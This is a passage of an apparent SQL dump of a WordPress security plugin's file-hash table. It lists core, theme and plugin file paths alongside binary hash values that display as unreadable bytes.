Ք���ۻ����!�|d�p�','',0,'?'),('���������*_�\"','wp-content/plugins/wp-cerber/assets/flags/tc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Sp�I��7��03CP','[���V�c\"��Z}t�a�n��%PB\ZgF�Yw','',0,'?'),('���/��\Z��)y�\r','wp-includes/blocks/html/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-�FV�y�o����','���RA��A�ȧ/��r�4H�-@��(\n	�7R4�','',0,'?'),('��$��xM1>�_8P\0','wp-includes/js/swfupload/swfupload.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��#����9��>&YRg','��ݙ���R�YY-�ҕ�&qW1(�K��','',0,'?'),('��Qs|�c�L؜VH�)','wp-admin/includes/class-walker-nav-menu-checklist.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?L�,k��|n�','�r�J�_9���~��uz�{�z������P','',0,'?'),('��/8&�D�g|��#','wp-includes/js/dist/viewport.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ߙ��,���B�','H9����Y߈�݆��3L ��c���Jگ	=�','',0,'?'),('�\Z���M`�yᕙd�','wp-content/plugins/wp-cerber/assets/flags/cm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!�.��`�t�sI01','���F�]��g�ZBN��to	Q��m�,�j','',0,'?'),('�Ox��ر��c5(','wp-includes/css/dist/block-library/theme.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Gs�Ib<���w]G��','כ�ppr��›xI�xP^�?	���N�%�u�','',0,'?'),('�n97�I.O�ҝ޿�','wp-includes/js/heartbeat.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^���@H�l�\Z�g2�','e�x\'�s��v+�q�LW����/,��k�g%\0�','',0,'?'),('�|Bl�IHҼ�OSƱ','wp-includes/js/mediaelement/mediaelement-migrate.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<�C�_hz�3��<7',',b#0�!a�OVc,��ؕSԏI�л%��p)��','',0,'?'),('���ب&G�)�k{��','wp-includes/sodium_compat/namespaced/Core/HChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��h���P���','K����d�%�.RAO�F��������jo�-','',0,'?'),('��M�Ӽ��7T�~���','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/AbstractRecord.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$�kA�`�lw���y�','7\r4	춥Q\nc��>c\n>�Pf8�4��Hk�','',0,'?'),('��f餧xM�P]~B��','wp-content/plugins/akismet/class.akismet-cli.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z��� ���qE9g:I','v26�}۞���\Z�\no��g$�$�@[�C�\\V','',0,'?'),('����h+��B����','wp-includes/js/tw-sack.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7�X��wO��qa','k�\r<�I�-�Vsp�6gb4eb���fs�Ҹ��','',0,'?'),('��F�\"��vh�$Lb��','wp-includes/js/imgareaselect/border-anim-v.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �z!�<�7�����*�','��>���d�:���j1�<�!4�6�g��','',0,'?'),('��˩6�f/�6YjI\0�W','wp-content/plugins/wordfence/modules/login-security/views/settings/options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>��{��^vƍ����','Z��%��ĩZ�d�^����m���͖(8��ծ','',0,'?'),('��MAH���\0�[d_�!','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_namespaces.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�,}vĨ3��G��)�','E�r4@\0�ԡ$��z�3�$l��\Z�`i�ex�l�','',0,'?'),('��yc�0O�g)ρ�Mf�','wp-admin/network/site-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','͢Ɵ6��ǰD�ۦ�','6i�b�؋��u-��L���^�	�v�4|f�%�Xg','',0,'?'),('�tDZ%������F','wp-content/plugins/wordfence/lib/wfNotification.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0Ǎ V2�(��dhVD','S�a��Y����gj+|�� ��J��M8��','',0,'?'),('��Fj]p� ���Ac\rp','wp-includes/Requests/Exception/HTTP/406.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K��l�h�r��9�\"\0�',',aY��}PR6���`�)K�f�ism ���','',0,'?'),('�$����!���+&q�','wp-content/themes/twentytwentyone/assets/sass/05-blocks/code/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$sR��iNS&&$�d','��l��W�+��� ��5�� ���\rզI9Yk','',0,'?'),('�1��ϣ�����I�','wp-content/plugins/wordfence/lib/wfImportExportController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����������+>��','�dlы۹`�������J���#|i{�','',0,'?'),('�<��|~E.�Y^�!�]','wp-admin/js/widgets/media-audio-widget.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&t��K!��1��vDb','9���:��%�B�Ɖ\\c֏��WpX�	�Q���','',0,'?'),('�?�\n5��H�?����','wp-admin/css/customize-controls.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������`�ˎz��\Z�','*���}\0P������y��]�yOr�@�|','',0,'?'),('�DV�ɪl�-�XC��`\\','wp-content/plugins/wp-cerber/assets/flags/cu.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ѝhm!�7���3.�','P�bLO���*]���3�o	}���z�xN��','',0,'?'),('�����juGCtO���','wp-admin/css/colors/coffee/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���g_ZY�Y����/','oI���P�g��K7�$v��vxlk���t��Ea�S','',0,'?'),('��l�.H|S���{��','wp-includes/js/jquery/ui/effect-transfer.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&��H������*��l�','%��({cI�}��,�Ѧ�)��1`WɆ','',0,'?'),('���ISU`u���T��F','wp-includes/sodium_compat/src/Core/ChaCha20/IetfCtx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l�{�bOs�_a��>','m�n5��ߐ֞βgJ�\\�����3�����','',0,'?'),('�ʚ�{�(���\\i�7.','wp-includes/Requests/Exception/HTTP/431.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��s|b$��ѓ<��','�ꅱ��/Y6_���w�pk�w���0���','',0,'?'),('��}�^72������','wp-includes/Requests/Exception/HTTP/415.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X��Tb�̮�JU�','v%�_�\0�b$m�&`���(�=�m<�b\Zo0p','',0,'?'),('���3Ȉ��m�Y4���','wp-content/plugins/wordfence/js/wfselect2.min.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�������!�.���i','l�k}[�ZjA�.!��=+5�+�~q� 1','',0,'?'),('���3�qc;*�V\08�\\','wp-content/themes/twentynineteen/sass/variables-site/_transitions.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ӌؠ����v&��Ad','K��s;���o���ZÏ�Y�S���!e������','',0,'?'),('���an���V=Ty X�','wp-includes/SimplePie/Copyright.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k��>�����ԪQ','�i��%�ܴ��E�^g���2�z,�@�Q��V','',0,'?'),('�N<w()/�E��.�bI','wp-content/plugins/wp-cerber/assets/flags/st.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e��l��Iy���`�f�','�x����˹�5��0��s�	��.:l���','',0,'?'),('�} �yT��Z�H�cDJ','wp-admin/js/custom-background.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�2� �S�o-E��','����Dʹ�:&�o�n�����L���3�,E','',0,'?'),('��=�I��˭C�Z�','wp-content/themes/magazine-hoot/include/admin/images/archive-big.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����(��l4*�','6ߚ<9Α+1��D`�_I`�+��uY��7�,/','',0,'?'),('���I4�;]2ѝd��O','wp-content/themes/magazine-hoot/hybrid/inc/functions-fonts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e=EGG�Br�m�{<�5',';[nQ�5�Hc����qz!!�_��A�n�?�','',0,'?'),('���S���{|�\"uZz�','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-aside.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<�/�� ��j�t��J�','w;*�Ҙ�\rp�<L$�\r��\r��H\Z���','',0,'?'),('��{�0l(Ʋu9,wS�u','wp-includes/js/media-audiovideo.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ж���t\Z�����','s<~d;lL�n�_u+1��jDO����\\�\0��','',0,'?'),('���@6�ߝ\0AhHc�','wp-content/plugins/wp-cerber/assets/flags/hm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z�N��n�[���','��|�S�Qw\0��j�G��N��*M����v%','',0,'?'),('��)!)�6��>}�74','wp-includes/css/dist/block-library/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M\"7����g��6>','WM�����r�0���y7:5э�C<�o����','',0,'?'),('���L��V�Y��*','wp-includes/js/plupload/moxie.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|A��09��K�:���','��[\n��Y�@sZ�F�Ul�+�Έ�f���Ǩ\0','',0,'?'),('� �A$ۤfC�N��37','wp-includes/query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O���o�y&���u','Z�@�?@��ή��=���*^(21����y����','',0,'?'),('�(���ה�W�h@=a','wp-includes/images/smilies/icon_mad.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V�!�@�c�0�S�','�������d[O:LJ�����jl}�q�','',0,'?'),('�7�0���,�		M','wp-includes/sodium_compat/namespaced/Core/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Qy���?�;�8�V\n�','\0�-��]뮳��XEt)�`��1�C�}Mr2�/','',0,'?'),('�g\Z��\\�\r�`=�m�','wp-content/plugins/wordfence/modules/login-security/classes/model/tokenbucket.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P\r�L����{ǀ�','����VZ+��&�\r�Щ�U;�L)R�!ӵ�','',0,'?'),('�i���B�j����]','wp-includes/sodium_compat/namespaced/Crypto.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G8�J+��	��z','>8���\'X�i�Ub�Gн�,<T`6��4Ѝ�','',0,'?'),('����v���ό�Y9�','wp-includes/ID3/getid3.lib.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CPb$M6̟��ҁ�','\"\Z^�,8>K����@��湅����l��|AF��','',0,'?'),('���X����H�o�v�','wp-admin/css/common-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���i�q㤭�{���$I','ŁnGĂ�M\"k�7�w\"ҥ�!�I[�1','',0,'?'),('��!N��D�w�`��[�','wp-includes/js/jquery/ui/dialog.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�屬�U��u���z̜','H7�pn�\Z��8����__E<��\r��','',0,'?'),('��U�]>�rք�{��v','wp-content/plugins/wp-cerber/assets/flags/cf.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C��oG��`?���','�\0�m�٢K��K��ǡNЙT���	��','',0,'?'),('���Xp����~0D','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/HSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W�oe�~��oB2�_;','5�q��SrL�]�OX����sq����+l<��ɒ','',0,'?'),('��֗]NR���S{qv?�','wp-admin/css/wp-admin-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',*i����[p]��<','r5S�E�?29/�)��_�PJv�Vh���R�','',0,'?'),('��\Z,z���Ґ�U�','wp-includes/rest-api/endpoints/class-wp-rest-terms-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y[�&A*zϦ/��?<�','�������Dn��N����AU)n�J�','',0,'?'),('��5\r�Y��☺;�h','wp-content/themes/magazine-hoot/hybrid/inc/functions-meta.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2͜�4{`R�y���;','!]ͳ�,q̪\rM�+�F즪u\'�rɒ�l��\'�','',0,'?'),('��O܎$8��J�e��','wp-content/plugins/wordfence/models/scanner/wfScanner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H p3+$������','�I�E���|��Ap��ך�X�9n@��','',0,'?'),('��*v�<�TC�U�XJn','wp-includes/blocks/column/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b\'��������E�4�','z�,�g3�l[�9�v[�=\rW�\'3e�c�INڷ�','',0,'?'),('�\0��߯NI���','wp-content/themes/twentynineteen/inc/back-compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��=�D�F/�u+:��@�','�=7���a(P�w�Ɯ&���|�������','',0,'?'),('�����n�E��','wp-content/plugins/all-in-one-wp-security-and-firewall/css/wp-security-site-lockout-page.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��nOΨ�J���z�<','ԥ6Wi��� F4�hd��4��ˡV8�\0ݟ�','',0,'?'),('�V�܂0\0U�`�5C>','wp-includes/css/dist/components/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\�t�<���l�j�!','QR0�2�>�S��\\���}�a�sz9�<','',0,'?'),('�\rq��O����D�zs','wp-includes/pomo/pomo/translations.php',0,'��C���*\Z�\'��','��C���*\Z�\'��',')��P��Š�ObxZ-dtWN��ǧ�~x�^Y��','',0,'?'),('��	�6��!\"�P	','wp-content/themes/twentytwentyone/package.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����M���<HC�:@�','�H�E���\rA��l8k#�h�@w�}�}','',0,'?'),('�\Z� �R����[�\'�>','wp-content/plugins/wordfence/css/images/ui-icons_777620_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J�\\c7�y�x�гl','�~��qV����*\'�1�����]3�^�����m','',0,'?'),('�$�����j�X�])D:','wp-load.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f+ʅ�D`\0��`d->}','|�:m\"�S,�h�k���\Z8V��0d�eCe�','',0,'?'),('�1KZ����^�����y','wp-content/themes/magazine-hoot/hybrid/readme.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���p�\'Җ�n�M%`','7m�Y���ϫ�J?C����1-I�8R��WK�','',0,'?'),('�2�\\�17Հ�wi�{','wp-includes/js/dist/vendor/wp-polyfill.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P����$@A.0�Qt','@b�/E�ؔå��;M	�ۙZRİ�x����','',0,'?'),('�H�)������jH�j','wp-content/plugins/wordfence/modules/login-security/classes/model/text/javascript.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V�\'B�l�If���\"c','��O$��U?��\nR��y���V�=�T���Z','',0,'?'),('�j%M�ɍ��p)Z��','wp-admin/images/generic.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\'�[#98!�','�{u���K[g͆Ex�{�:߼��lͨG��','',0,'?'),('���v�*~����ߏ','wp-content/themes/twentytwentyone/assets/images/playing-in-the-sand.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%��8I/CM��x��','��W}u�}��v��m��7=E�K�Y4','',0,'?'),('��RKQ�5v�-��	��','wp-includes/css/dist/edit-post/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-��b�E��y�L�J��','—9 �`��\'@GGXLH��K����Ħ�ᚆ','',0,'?'),('�±ݐ�l;g����','wp-content/themes/magazine-hoot/include/admin/trt-customize-pro/section-pro.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��gԴV���Ir�}','�o��J\0\\mǸ�]�̾�T�{��=�I\ZXt[Y','',0,'?'),('��;(Xp`ҙ��pݷ','wp-includes/js/plupload/handlers.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T_\'!;��QYЦIk&Q','�I��Zh�y8s��Cv����rTVRḾ','',0,'?'),('��ƕ�\'+���3�\n	','wp-content/themes/magazine-hoot/hybrid/extend/images/patterns/2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���bo��Q�w�','�W�v8:U��͑����pZ~�6dk\0�\\}˞','',0,'?'),('��t�0�g�a�/��','wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~��-����x\'�	','��{ڋ��N�o��#X�+Xe\'�����_����>\Z','',0,'?'),('�\n�qo�qZVyX��9','wp-admin/includes/menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#&��9��hE�p��6�','Ǫ�s��E\'���\\l��D)i�$�����q','',0,'?'),('��l��\Z+��t�A��','wp-content/themes/magazine-hoot/hybrid/admin/functions-admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%�(����g����','�U\0���`W�G\\��:�DE̞��Ԥ�.','',0,'?'),('�!�+��U�U��\n&','wp-content/themes/twentytwenty/classes/class-twentytwenty-walker-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v���I\"��cz>�','�мU�h\n5?�Iq9�L��SC0�eGDe��','',0,'?'),('�)q�\"��ff�\nlߩ|','wp-content/plugins/wp-cerber/admin/cerber-admin-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0Ow�\n��<[�Q','���呂 p�oG��r�X?���,���','',0,'?'),('�`�@�����YE�!','wp-includes/Requests/Transport/cURL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��87a`CZ��','hI���� x<�������%��ji�����$','',0,'?'),('��Ư	\'CԻ��ګ\Z','wp-includes/images/admin-bar-sprite.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S���:�W���^','��rN!�`VO�c��K��viՀ{Fn\Z��le','',0,'?'),('��4��#հ�}��','wp-content/plugins/wordfence/modules/login-security/views/manage/code.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�j-�W�.�{��@','�i%X�Y`FmZ���E^ab}r�_E�����3�','',0,'?'),('��\"�Z0\0ؿe�Ԧp�','wp-admin/css/admin-menu.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T:�#}�9�H��76��','���i��O*�i������/ŝ�v�y��a��','',0,'?'),('����\"8Y��74�O<','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','di�BD�J���D�5�O','N�a���i�B���\r��AO]���@�P��','',0,'?'),('����x8[!>�X','wp-admin/includes/class-wp-users-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�N\n�V�\r�@���&�','���)%����n�Aڛ.}����x\"�}���n','',0,'?'),('����o*nFߘ7��','wp-content/plugins/wp-cerber/assets/flags/mv.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'���FꠈT�[�~��','�dE4{��P�-��B������:�Þ$�{FF�','',0,'?'),('��E$�q�|�\r_=','wp-content/themes/magazine-hoot/hybrid/css/gallery.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[�T(*N�I�+\'�','��	`��рU�g�0�|*��mA�I�Y�t�','',0,'?'),('��ue�{X�1���','wp-includes/sodium_compat/src/Core32/Poly1305/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��D�5��$ý\n	�\'q0','\\��\"�ԯ-\r6��e�N�ID�zB�\r\0��','',0,'?'),('�(���a���b��(�','wp-content/plugins/wordfence/css/wf-global.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ADmqc��v��d9','�(O��ӛˀԟMAW��D�0޳�\\��5LG�','',0,'?'),('�/��0)���\Z�','wp-content/plugins/wordfence/views/scanner/issue-database.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[�� \n�Ro�N7�|','~��❃gd�&w[�u������o��|t��}','',0,'?'),('�1�cUd���/R�	','wp-content/plugins/wp-cerber/assets/flags/nu.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','׭Y�C�����=7Ѝ�','���z��f���7?v�F�`)c�۱���s`$+','',0,'?'),('�@�q��G�-$����|�','wp-content/plugins/wordfence/modules/login-security/classes/controller/db.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����gPʋ��i��[','�DeJ�\Z�fxb�	x\'P�:�����U','',0,'?'),('�J�:��`A�q����1','wp-content/themes/twentynineteen/images/pattern_04.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��*����$[��;��R','#��(4�2L{���]����{˖e~1\'��0','',0,'?'),('�S���KK2iɈ','wp-includes/comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A���]�ř3F8rȃ','\'B�6E�:��bw=�#u�\0��>	&���M�','',0,'?'),('�x�_,[��5����','wp-content/plugins/wordfence/images/sort_asc_disabled.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Ǐ#a]2������','����[8l�Y���ckl��	��u#KV���n','',0,'?'),('�y�g��zaU\"�	XKG','wp-includes/js/hoverIntent.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��z/P���ꮱ<	�','t��neTR/�77�@\Zҧ0�g�nj����','',0,'?'),('�����gFB�ZÚ(v','wp-content/themes/twentytwenty/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Xŏ������i�','���&T6bbeV%��]�R���v�Q$�/�','',0,'?'),('���NTZt�o\r�%��F','wp-content/plugins/wordfence/views/scanner/options-group-general.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�tL�Ga�\0�oҠbY','2�6��l�n\r��\"� c�:�ƅz�v�J1ܶ��','',0,'?'),('����������wT','wp-includes/blocks/button/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\��]��u���H(','A$\Z�\Z�d��1�����/�ހ[�7�G','',0,'?'),('�o�/�d�4x`��','wp-content/plugins/akismet/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' B\0,��\\�>��T��P','&���D��*n�.�[��(O����4���P��','',0,'?'),('�+Fc�0m_����Ii','wp-content/themes/twentytwentyone/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-�\nq3Ԙ>�}6Y�','Ĭ{z�K��E[�j8��؈��Oݩ��r���5d�','',0,'?'),('�/�ɘ�]�^�W\\�q','wp-includes/css/wp-embed-template.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')I+�w2�h���K\"�','�6&�}�ok��AM\Z> �|�F�6,e�t\rPq','',0,'?'),('�v{L�Jlō�Yz�`�(','wp-includes/js/thickbox/thickbox.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7��P�R�n�,(�f�','M�ߍ��V�_�^����ol\'\0��qYL�̘)���','',0,'?'),('��k��V��G�d�/��','wp-content/plugins/wp-cerber/assets/flags/th.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��w�Vtc��3�G�G�','��o�#�ߗ|!\\A�L=Uހ��L��q�Y�p','',0,'?'),('��(��NL�;	��','wp-includes/js/dist/api-fetch.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B��p=(mV�2��_a','G�y���л\r��7�5���d������R��','',0,'?'),('��?UB�w��N	i�','wp-content/themes/twentynineteen/sass/navigation/_menu-footer-navigation.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f��p��4g����','�����x8o1������b��pr���p���','',0,'?'),('���퇴���u��4�6','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/HttpException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l�fk��<��\r\n��','R!�O]p�I\n��\\��VP�9�=��!�?���','',0,'?'),('�����A���V�f��','wp-content/plugins/wp-cerber/assets/flags/ug.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����h�UNJ}�','��;�T�W��m��	����(Izҁ��h2','',0,'?'),('�X�VטO|8}���','wp-includes/theme.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W]��(DR{��.','Xe[	�4\0����\",����d��ځ��#�','',0,'?'),('�.�XvQa�*C��eN','wp-content/plugins/wp-cerber/assets/flags/ph.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','06zD\'�w��� �','����?�ͺ�mV�yi�z2	�BC�	m�jX��','',0,'?'),('�B�H*mz��N83��','wp-admin/css/edit-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3au\r�\rt��3	�','��+y�6f��#E8+ڨC��D���؂�n��','',0,'?'),('�V}�P���m�/�|I*�','wp-includes/js/customize-loader.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`�6��!��҃z��','�G?~�D�,(�F]�I�bNE��pc�v:���z','',0,'?'),('�l��t:{0+7�9C�','wp-includes/sodium_compat/src/Core/HSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Hx+�07��`�}�','@qz�j�I���� \0D�a�W��6n�{���y�','',0,'?'),('��.��v8-rJŕ�qQ','wp-includes/js/wp-auth-check.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j{�,��ݍ�][c','�R)C�`p��	ъ ���;(�Ltcn�zƈ��','',0,'?'),('��6��U�Ѧ�u�','wp-includes/rest-api/endpoints/class-wp-rest-block-directory-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F�S:&\0��>f�\\�','�l�/r+���j�EQ�n��ھ�y�~Q�','',0,'?'),('��7��E#�wŧj���','wp-admin/includes/image-edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','LY���b �z.c�','\\�ǫ�0.��^IR�����UQ��2e@��]','',0,'?'),('����bq�/���F�k','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��7��¤\r�F��g','�n�V\'�V����V�)F|*ᑝ2�N��z','',0,'?'),('���\\AGqn�K7�','wp-content/themes/magazine-hoot/sidebar-shop.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\ZJ,��e}\'�a��E','�eSZȽu[��b,S��3qM�`���a_�#G','',0,'?'),('��v��|�-��','wp-includes/js/tinymce/plugins/tabfocus/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!�<�]��r�','���p[�����L7F��|˖ZB�R�','',0,'?'),('�!HUN&�\"����z��','wp-admin/css/widgets.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� !�y,6��Yh���','0��Ú�1B$��Н�_@��#Xw� �p5�P','',0,'?'),('�L��~iS?�v�C>�@y','wp-includes/blocks/latest-comments/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�i6��xu0\\����','�s�\"9���l���+���/���[�','',0,'?'),('�a�tU�q�^!�0ƣl�','wp-includes/post-formats.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h�%�J|,%Fś@','��6�x��q�#�\n��[j��E��9�9e�^Q','',0,'?'),('�k���zߣ����bo�R','wp-admin/post-new.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I\n(��ḑ���{z','�T�Ѷ�����Lc���4�O���oFd���d','',0,'?'),('�vO��#�J�N��+쁁','wp-content/plugins/wordfence/css/images/ui-icons_ffffff_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Aa+JD$�2��J��','�/#?T�iOLyv��u��TK���ɤ��\\ػ�','',0,'?'),('�|v�P��0�fh�T�','wp-includes/js/dist/block-directory.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':